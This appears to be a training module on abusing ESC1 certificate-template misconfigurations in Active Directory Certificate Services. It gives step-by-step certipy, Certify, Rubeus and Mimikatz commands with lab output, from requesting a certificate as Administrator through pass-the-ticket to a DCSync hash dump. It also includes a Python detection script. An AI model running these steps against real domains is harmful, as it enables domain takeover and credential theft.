ESC1
ESC1 (Escalation 1) is the first of the domain escalation scenarios; it belongs to a group of escalation scenarios that abuse misconfigured AD CS certificate templates.
Understanding ESC1
The primary misconfiguration behind this domain escalation scenario is that the requester can specify an alternate identity in the certificate signing request (CSR). If a certificate template lets the enrollee supply the subject, and therefore a subjectAltName (SAN) naming a user other than the one submitting the request, we can request a certificate for any user in the domain.
Suppose we compromise the domain account BlWasp. We can use it to enumerate the CA's certificate templates, hunting for ones that allow the inclusion of alternate names (SAN). If such a template exists, we request a certificate with BlWasp's credentials and place the desired account (e.g., Administrator) in the SAN field. The CA issues the certificate and returns it to us, and we can then use it to authenticate (via PKINIT or Schannel) as the account named in the SAN. The certificate acts as a credential for the higher-privileged user, so the result is unauthorized access and privilege escalation.
Note: While most examples within this module have the ADCS service residing on a domain controller, know that it can be deployed on a server other than the DC.
ESC1 Abuse Requirements
To abuse ESC1, the following conditions must be met:
- The Enterprise CA grants enrollment rights to low-privileged users.
- Manager approval is turned off (otherwise each request stays pending until a certificate manager approves it, and only social engineering or a compromised manager would get it issued).
- No authorized signatures are required (msPKI-RA-Signature is 0 or absent).
- The security descriptor of the certificate template is overly permissive, granting enrollment rights to low-privileged users (for example Domain Users or Authenticated Users).
- The certificate template defines an EKU that enables authentication: Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or no EKU at all.
- The certificate template allows the requester to specify a subjectAltName (SAN) in the CSR (the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit of msPKI-Certificate-Name-Flag).
ESC1 Enumeration and Attack
We will discuss how to enumerate and abuse ESC1 from Linux and Windows.
ESC1 Enumeration from Linux
To begin with, we can identify AD CS vulnerabilities using certipy with the find command and the -vulnerable option. Let's use the account blwasp@lab.local with the password Password123!. The options we will use are the following:
- Username: -u / -username <Username>
- Password: -p / -password <Password>
- IP address of the Domain Controller: -dc-ip <IP>
- Find vulnerable configurations: -vulnerable
- Output the result as text to stdout: -stdout (if this option is not present, the output is saved as .txt, .json, and BloodHound data)
Note: We will discuss BloodHound usage later in this module.
Finding Vulnerabilities in ADCS
$ certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 40 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Trying to get CA configuration for 'lab-LAB-DC-CA' via CSRA
[*] Got CA configuration for 'lab-LAB-DC-CA'
[*] Enumeration output:
<SNIP>
Certificate Templates
4
Template Name : ESC1
Display Name : ESC1
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
Write Property Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
[!] Vulnerabilities
ESC1 : 'LAB.LOCAL\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
Note: The above listing shows only a portion of the Certipy text output, specifically the template vulnerable to ESC1. The complete output likely includes other templates and Certificate Authority vulnerabilities that we will discuss later.
In the above output, the template ESC1 is vulnerable to ESC1, as the [!] Vulnerabilities section states. We can confirm this by checking each condition in the template details:
- Enrollment Rights: LAB.LOCAL\Domain Users.
- Requires Manager Approval: False.
- Authorized Signatures Required: 0.
- Client Authentication: True (the Extended Key Usage list includes Client Authentication).
- Enrollee Supplies Subject: True.
Note: Keep in mind that a template may be vulnerable even when Enrollment Rights does not include Domain Users; it is enough that it grants enrollment to any group (or user) we control, for example Authenticated Users, Domain Computers, or a custom group our compromised account belongs to.
ESC1 Abuse from Linux
To abuse the vulnerable ESC1 template, we use certipy's req command to request a certificate and the -upn option to set the alternative subject in the SAN (in this case, Administrator), authenticating with the compromised BlWasp account:
Certificate Request with alternative SAN
$ certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -ca lab-LAB-DC-CA -template ESC1 -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 58
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
The above command saves the issued certificate and its private key to administrator.pfx, which we can use to authenticate as the Administrator. Note the line [*] Certificate has no object SID: the CA did not embed the requester's SID in the certificate (the security extension with OID 1.3.6.1.4.1.311.25.2 introduced by KB5014754). Domain controllers in Compatibility mode still accept the UPN in the SAN as a (weak) mapping; once they are configured for Full Enforcement of strong certificate mapping, a certificate with no SID extension and no explicit altSecurityIdentities mapping is rejected for PKINIT, and this step fails.
Note: If we get an error: The NETBIOS connection with the remote host timed out, just try again.
Certificate Authentication
$ certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 10.129.205.199
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@lab.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:<SNIP>
To authenticate, we can use the TGT saved in administrator.ccache. Additionally, certipy retrieves the NT hash of the Administrator account: after obtaining the TGT via PKINIT, it requests a user-to-user (U2U) service ticket for the same account, whose PAC carries the PAC_CREDENTIAL_INFO buffer with the NT hash (the KDC includes it only for PKINIT logons). Let's use the TGT to run wmiexec.py:
Use TGT to connect to the DC
$ KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
lab\administrator
Note: To use Kerberos and obtain a TGT, we must be able to resolve the domain controller's hostname. We can configure our DNS to point to the domain's DNS server or add the DC's name to the /etc/hosts file.
ESC1 Enumeration from Windows
When attacking from Windows, we typically already have access to a domain-joined computer and run the tools from there. For this example, we will connect to the domain controller itself and perform the attack from it. Let's connect to the domain controller via RDP using blwasp's credentials:
Connect via RDP
$ xfreerdp /u:blwasp /p:'Password123!' /d:lab.local /v:10.129.228.236 /dynamic-resolution
[19:18:25:549] [948409:948410] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[19:18:25:549] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
...SNIP...
We can identify AD CS vulnerabilities using Certify.exe with the find command and the /vulnerable option. Unlike the Python version, on Windows we do not enter credentials: Certify queries AD with the security context of the logon session it runs in, so we must consider which user context we run it from.
Enumerate ADCS with Certify.exe
PS C:\Tools> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Listing info about the Enterprise CA 'lab-LAB-DC-CA'
Enterprise CA Name : lab-LAB-DC-CA
DNS Hostname : LAB-DC.lab.local
FullName : LAB-DC.lab.local\lab-LAB-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=lab-LAB-DC-CA, DC=lab, DC=local
Cert Thumbprint : CF54249CAEFB0E092265BFD306940DCBABA4C9A6
Cert Serial : 16BD1CE8853DB8B5488A16757CA7C101
Cert Start Date : 26/03/2022 01:07:46
Cert End Date : 26/03/2027 01:17:46
Cert Chain : CN=lab-LAB-DC-CA,DC=lab,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
Allow ManageCA, ManageCertificates LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Allow ManageCA, Enroll LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Allow ManageCA, Enroll LAB\user_manageCA S-1-5-21-2570265163-3918697770-3667495639-1194
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : LAB-DC.lab.local\lab-LAB-DC-CA
Template Name : ESC1
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
WriteOwner Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteDacl Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteProperty Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
<SNIP>
Additionally, we can use PowerShell (the Get-ADObject cmdlet from the ActiveDirectory module) to list the certificate templates that meet the conditions for ESC1:
PowerShell ADCS Enumeration
PS C:\Tools> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=OfflineRouter,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local OfflineRouter pKICertificateTemplate f1f9e21c-f31c-4d4e-85de-4682867c4d82
CN=ESC1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local ESC1 pKICertificateTemplate 210ae26a-2668-413c-aad8-983ea2a5434a
The above command queries Active Directory for certificate templates. Let's break down the command and its output:
- The Get-ADObject cmdlet queries AD objects. Its -LDAPFilter parameter takes an LDAP filter, and -SearchBase restricts the search to CN=Configuration,DC=lab,DC=local, the configuration partition in which certificate templates are stored (under CN=Certificate Templates,CN=Public Key Services,CN=Services).
- The LDAP filter selects templates that satisfy the ESC1 conditions. The matching rule OID 1.2.840.113556.1.4.804 (LDAP_MATCHING_RULE_BIT_OR) tests whether any of the given bits is set in an integer attribute, which is how the flag attributes are checked.
- (objectclass=pkicertificatetemplate): only certificate template objects.
- (!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2)): excludes templates whose msPKI-Enrollment-Flag has bit 2 (CT_FLAG_PEND_ALL_REQUESTS) set, i.e. templates that require manager approval.
- (|(mspki-ra-signature=0)(!(mspki-ra-signature=*))): msPKI-RA-Signature is 0 or absent, i.e. no authorized signatures are required.
- (|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4)): the template's EKUs include Smart Card Logon, Client Authentication, or PKINIT Client Authentication, respectively.
- (mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1): bit 1 (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) of msPKI-Certificate-Name-Flag is set, so the requester supplies the subject and SAN.
Note that this filter does not check who can enroll: a template it returns (such as OfflineRouter above) is only exploitable if the template's ACL and the CA grant our account enrollment rights. It also misses templates with the Any Purpose EKU or with no EKU at all, which can be used for authentication too.
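The following Python script is an added example (not part of this page, nor code from Certipy or Certify). It applies the ESC1 abuse requirements listed earlier to raw template attributes, decoding the msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag bits that the tools print symbolically, and generates the LDAP filter of the PowerShell enumeration from the same constants. The sample templates, their attribute values and their enrollment SIDs are constructed for illustration (only ESC1 mirrors the output shown on this page; OfflineRouter, ApprovedUser and NoEKU are assumed), and the check goes slightly beyond the LDAP filter by also covering the template ACL, the Any Purpose EKU and templates with no EKU.

```python
"""Added example (not from the page, Certipy or Certify): evaluate the ESC1
conditions on raw certificate-template attributes and build the matching
LDAP filter. All sample data below is constructed for illustration."""

# Bit flags of msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001      # requester supplies subject/SAN
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002               # manager approval required
CT_FLAG_PUBLISH_TO_DS = 0x00000008
ENROLLMENT_FLAG_NAMES = {
    CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS: "IncludeSymmetricAlgorithms",
    CT_FLAG_PEND_ALL_REQUESTS: "PendAllRequests",
    CT_FLAG_PUBLISH_TO_DS: "PublishToDs",
}

# EKU OIDs that let a certificate authenticate a principal.
OID_SMART_CARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_ANY_PURPOSE = "2.5.29.37.0"
AUTH_EKUS = {OID_SMART_CARD_LOGON, OID_CLIENT_AUTH, OID_PKINIT_CLIENT_AUTH, OID_ANY_PURPOSE}

# Enroll rights for any of these principals mean "low-privileged users can enroll".
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}      # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515", "545"}         # Domain Users, Domain Computers, BUILTIN\Users

LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"


def decode_flags(value, names):
    """Name the bits set in a flag attribute, the way Certipy prints them."""
    return [name for bit, name in sorted(names.items()) if value & bit]


def allows_authentication(ekus):
    """A template with no EKU at all (SubCA-style) is usable for any purpose, logon included."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def low_priv_can_enroll(enroll_sids):
    return any(sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS
               for sid in enroll_sids)


def esc1_conditions(template):
    """Map each ESC1 requirement to True/False for one template (dict of raw attributes)."""
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0)
    ra_signature = template.get("msPKI-RA-Signature") or 0    # absent attribute counts as 0
    return {
        "enrollee_supplies_subject": bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": ra_signature == 0,
        "authentication_eku": allows_authentication(template.get("pKIExtendedKeyUsage", [])),
        "low_priv_enroll": low_priv_can_enroll(template.get("enroll_sids", [])),
    }


def is_esc1(template):
    return all(esc1_conditions(template).values())


def find_esc1(templates):
    """Names of the templates in a {name: attributes} dict that meet every ESC1 condition."""
    return sorted(name for name, attrs in templates.items() if is_esc1(attrs))


def esc1_ldap_filter():
    """The LDAP filter of the PowerShell enumeration, built from the same constants.
    It cannot express the ACL check and omits the Any Purpose / no-EKU cases."""
    return (
        "(&(objectclass=pkicertificatetemplate)"
        f"(!(mspki-enrollment-flag:{LDAP_MATCHING_RULE_BIT_OR}:={CT_FLAG_PEND_ALL_REQUESTS}))"
        "(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))"
        f"(|(pkiextendedkeyusage={OID_SMART_CARD_LOGON})"
        f"(pkiextendedkeyusage={OID_CLIENT_AUTH})"
        f"(pkiextendedkeyusage={OID_PKINIT_CLIENT_AUTH}))"
        f"(mspki-certificate-name-flag:{LDAP_MATCHING_RULE_BIT_OR}:={CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT}))"
    )


# Constructed sample data (assumed values; only ESC1 mirrors the output shown on the page).
DOMAIN_SID = "S-1-5-21-2570265163-3918697770-3667495639"
SAMPLE_TEMPLATES = {
    "ESC1": {
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": [OID_CLIENT_AUTH, "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "enroll_sids": [f"{DOMAIN_SID}-512", f"{DOMAIN_SID}-513", f"{DOMAIN_SID}-519"],
    },
    "OfflineRouter": {   # matches the LDAP filter, but only admins hold Enroll
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "pKIExtendedKeyUsage": [OID_CLIENT_AUTH],
        "enroll_sids": [f"{DOMAIN_SID}-512", f"{DOMAIN_SID}-519"],
    },
    "ApprovedUser": {    # like ESC1, but manager approval is turned on
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS | CT_FLAG_PUBLISH_TO_DS,
        "pKIExtendedKeyUsage": [OID_CLIENT_AUTH],
        "enroll_sids": [f"{DOMAIN_SID}-513"],
    },
    "NoEKU": {           # exploitable, yet invisible to the EKU clause of the LDAP filter
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "pKIExtendedKeyUsage": [],
        "enroll_sids": ["S-1-5-11"],
    },
}

if __name__ == "__main__":
    for name, attrs in SAMPLE_TEMPLATES.items():
        print(name, decode_flags(attrs["msPKI-Enrollment-Flag"], ENROLLMENT_FLAG_NAMES),
              esc1_conditions(attrs))
    print("ESC1-vulnerable:", find_esc1(SAMPLE_TEMPLATES))
    print(esc1_ldap_filter())
```

Run it with python3; ESC1 and NoEKU are flagged, while OfflineRouter is not because only administrators hold Enroll, which is exactly the case the LDAP filter cannot express, and ApprovedUser is not because of manager approval. Against a real domain you would fill the dictionaries from the template objects under CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration and from the Enroll ACEs in their nTSecurityDescriptor.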
ESC1 Attack from Windows
To abuse this template from Windows, we request a certificate that includes an alternative SAN. We use Certify's request command with /ca:<CA NAME> to specify the CA, /template:<Template Name> to select the template to abuse, and /altname:<Account to Impersonate> to set the account we want to include as the alternative subject:
Certificate Request with alternative SAN
PS C:\Tools> .\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:ESC1 /altname:administrator@lab.local
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : LAB\grace
[*] No subject name specified, using current context as subject.
[*] Template : ESC1
[*] Subject : CN=Grace Start, CN=Users, DC=lab, DC=local
[*] AltName : administrator@lab.local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 58
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAsrll8PDAN0okTiQRzYX1lsbU5D9nazZX4O0lAehrddfPZbJH
8gI37syxrjmlgYOwumXOeHf5Q1o9iQgfXDg0/60uS2+P6ZzbPmSrYLpaE5ougrPw
RvswDeeEMYfrDElQ3TLno1qvpQkce1iawndc+pM/AmMbpJvg7YEy1BJN2z8nYVkV
6TQq3ggMVKIcuIJeOlHX+wV47n/xhFmDqHTd6+VNsn01g2kyR6tsUyhh/JfjrPoU
2o2It9gtcyb0dHeJQPPTsOk/9b9r96ncHw4dNNhWNcd66OHPR9cAgqBO7M7lMjKp
B2pW6cXaf4b6J84IYpDovVwvh4mE+yqk0FMDJQIDAQABAoIBAAYXn8v4yPSZiGdJ
...SNIP...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGHzCCBQegAwIBAgITSQAAADonzL0qqiTGLAAAAAAAOjANBgkqhkiG9w0BAQsF
ADBEMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgNsYWIx
FjAUBgNVBAMTDWxhYi1MQUItREMtQ0EwHhcNMjMxMTE4MTEwMDM5WhcNMjcwMzI2
MDAxNzQ2WjBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZ
FgNsYWIxDjAMBgNVBAMTBVVzZXJzMRQwEgYDVQQDEwtHcmFjZSBTdGFydDCCASIw
...SNIP...
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:04.1419031
Next, we must convert the certificate to PFX format with OpenSSL. Certify prints the private key and the certificate together in PEM format; we copy that cert.pem output to our Linux machine, or use OpenSSL on Windows if it is installed, and run the conversion command shown at the end of the Certify.exe output, leaving the export password empty:
Convert Certificate
PS C:\Tools> & "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
Now, we can authenticate using Rubeus and the certificate we generated. We use the asktgt action with /user:Administrator (the user we placed in the alternative SAN), /certificate:cert.pfx for the certificate file, /getcredentials to retrieve the NT hash via PKINIT U2U, just as certipy does, and /nowrap so the base64 ticket can be copied easily:
Certificate Authentication
PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Grace Start, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::42d5:b682:fe30:8453%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
...SNIP...
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 18/11/2023 12:44:27
EndTime : 18/11/2023 22:44:27
RenewTill : 25/11/2023 12:44:27
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : sE3TSQyeA2X1SBjGpFDQjw==
ASREP (key) : 79B5CEFC05639C2C44F668D65DBC9CD4
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
Now we have two options to use the output provided by Rubeus: we can use the NT hash with any of our preferred tools (pass the hash), or use the TGT base64(ticket.kirbi) to get a session as the Administrator. Let's use the ticket with Rubeus.
One of the available methods is to create a sacrificial logon session with the Rubeus createnetonly action, so that the imported ticket does not overwrite the Kerberos tickets of our current session:
Create a Sacrificial Logon Session with Rubeus
PS C:\Tools> .\Rubeus.exe createnetonly /program:powershell.exe /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : True
[*] Username : RWIAKJRE
[*] Domain : 51H9LPO9
[*] Password : W8F3NI1K
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 8
[+] LUID : 0x5c1d7f
When we specify the option /show, the process we launch is displayed; in this case, it is powershell.exe. In the new PowerShell window that Rubeus just launched, we use the Rubeus ptt action with /ticket:<BASE64 output> to perform a Pass the Ticket attack:
Import Base64 Ticket into the PowerShell session using Rubeus
PS C:\Tools> .\Rubeus.exe ptt /ticket:doIGQjCCBj6gAwIBBaEDAgEW<SNIP>
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Import Ticket
[+] Ticket successfully imported!
Now this PowerShell process holds the Administrator's TGT, meaning we can act with the Administrator's privileges. As an example, let's use Mimikatz to perform a DCSync attack:
Use Mimikatz to Perform a DCSync Attack
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Tools> Invoke-Mimikatz -Command '"lsadump::dcsync /user:lab\Administrator"'
Hostname: LAB-DC.lab.local / S-1-5-21-2570265163-3918697770-3667495639
.#####. mimikatz 2.2.0 (x64) #19041 Jan 29 2023 07:49:10
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /user:lab\Administrator
[DC] 'lab.local' will be the domain
[DC] 'LAB-DC.lab.local' will be the DC server
[DC] 'lab\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 06/04/2022 18:42:27
Object Security ID : S-1-5-21-2570265163-3918697770-3667495639-500
Object Relative ID : 500
Credentials:
Hash NTLM: 2b576acbe6bcfda7294d6bd18041b8fe
ntlm- 0: 2b576acbe6bcfda7294d6bd18041b8fe
ntlm- 1: c7fc699065bf5158f23527e5f2b53f43
lm - 0: 26f4d26f6e423d829697f6d9d1f72bd2